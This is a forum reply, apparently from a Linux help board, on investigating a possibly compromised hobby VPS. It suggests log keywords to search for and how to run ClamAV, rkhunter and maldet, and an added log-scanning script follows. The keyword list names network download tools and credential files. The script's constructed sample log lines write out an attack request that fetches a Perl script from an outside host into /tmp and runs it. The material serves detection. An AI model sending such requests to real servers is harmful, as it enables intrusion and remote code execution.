Quote:
Originally Posted by rustyz82
While I appreciate your advice, and this is probably what I will end up doing, this isn't a critical site/box and I see this as the perfect opportunity to learn. Your advice is overall sound but condescending in nature. I personally have this VPS as a hobby and enjoy challenges like this. If this were a critical or at all important machine or website I would say you are 100% correct in your statements about hiring a professional, but since it's not, I would rather take this as an opportunity to learn and grow as a sysadmin. And eventually, I'll know what I'm doing. How else am I going to learn?
I didn't mean to sound condescending, sorry.
I just meant to impart the finality of the situation. It is a Great Time to Learn and this is a perfect opportunity.
Sorry for my terse answer. Most folks want a fix, not a path to a solution.
Start with
https://www.linuxquestions.org/quest...erences-45261/
Look for these keywords in the logs:
PHP Code:
chmod bash curl lwp-request wget lwp-download rm /tmp /var/tmp perl passwd group
clamscan is a great indicator (it doesn't clean anything but has a nice report feature)
Apt-based OS assumed. Else 's/apt/yum/g'
install it using
Code:
sudo apt-get install -y clamav
To manually run a scan, use
Code:
clamscan -ir /path/to/scan/
-i is infected
-r is report
Real example of a run:
Code:
----------- SCAN SUMMARY -----------
Known viruses: 4879143
Engine version: 0.98.7
Scanned directories: 5
Scanned files: 34
Infected files: 0
Data scanned: 4.22 MB
Data read: 2.58 MB (ratio 1.63:1)
Time: 31.835 sec (0 m 31 s)
rkhunter 1.4.3
Code:
cd /usr/src/
wget http://rkhunter.cvs.sourceforge.net/viewvc/rkhunter/rkhunter/?view=tar
mv index.html\?view\=tar rkhunter.tar.gz
tar zxf rkhunter.tar.gz
mv rkhunter rkhunter-1-4-3
cd rkhunter-1-4-3
./installer.sh --install
rkhunter --update
Before you scan, however, to eliminate false positives on the first run, see the "What to do with 'common' warnings" blurb at
https://help.ubuntu.com/community/RKhunter
LinuxMalwareDetect
Code:
cd /usr/src/
wget http://www.rfxn.com/downloads/maldetect-current.tar.gz
- untar it
- cd into it
- sudo ./install.sh
Finally, update and run
Code:
maldet -du && maldet -a /var/www/
Good Luck and Good Learning!
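A small defender-side script, added here and not part of the original post or thread, that does the log keyword search recommended above: it counts hits for each listed indicator keyword in a web-server access log and lists the client IPs behind those hits so you can pivot to everything that source did. The Apache-style log lines are constructed for the demonstration, and the function names are mine, not from the thread.

```shell
#!/bin/sh
# Added example (not from the original post): count hits for the indicator
# keywords listed in the post across a web-server access log, then list the
# client IPs behind the hits. Sample log lines are constructed for this demo.
KEYWORDS="chmod bash curl lwp-request wget lwp-download rm /tmp /var/tmp perl passwd group"

# Write four constructed Apache-style lines to a temp file and print its path.
# Three lines from 203.0.113.5 carry indicators (wget, /tmp, chmod, perl); the fourth is benign.
write_sample_log() {
    f=$(mktemp) || return 1
    cat >"$f" <<'EOF'
203.0.113.5 - - [10/Oct/2015:13:55:36 +0000] "GET /index.php?page=http://198.51.100.7/x.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2015:13:55:40 +0000] "GET /index.php?cmd=wget%20http://198.51.100.7/s.pl%20-O%20/tmp/s.pl HTTP/1.1" 200 128 "-" "lwp-request/6.0"
203.0.113.5 - - [10/Oct/2015:13:55:41 +0000] "GET /index.php?cmd=chmod%20755%20/tmp/s.pl;perl%20/tmp/s.pl HTTP/1.1" 200 128 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Oct/2015:14:01:02 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
EOF
    printf '%s\n' "$f"
}

# count_hits LOG KEYWORD: number of lines containing KEYWORD as a literal (-F) string.
# grep -c prints 0 but exits 1 on no match; "|| true" keeps set -e scripts alive.
count_hits() {
    grep -Fc -- "$2" "$1" || true
}

# scan_log LOG: print "keyword<TAB>count" for every keyword with at least one hit.
scan_log() {
    for kw in $KEYWORDS; do
        n=$(count_hits "$1" "$kw")
        if [ "$n" -gt 0 ]; then printf '%s\t%s\n' "$kw" "$n"; fi
    done
}

# suspicious_ips LOG: distinct client IPs (first field) on lines hitting any keyword.
# $pat is deliberately unquoted so each "-e keyword" pair becomes separate grep arguments.
suspicious_ips() {
    pat=""
    for kw in $KEYWORDS; do pat="$pat -e $kw"; done
    grep -F $pat -- "$1" | awk '{ print $1 }' | sort -u
}

# Usage: sh scan_indicators.sh /var/log/apache2/access.log; with no argument the constructed sample is scanned.
LOG=${1:-$(write_sample_log)}
scan_log "$LOG"; suspicious_ips "$LOG"
if [ $# -eq 0 ]; then rm -f "$LOG"; fi
```

Keyword matching is literal and unanchored, so short tokens such as rm will also hit inside other words; treat the counts as a triage starting point and review the matching lines by hand.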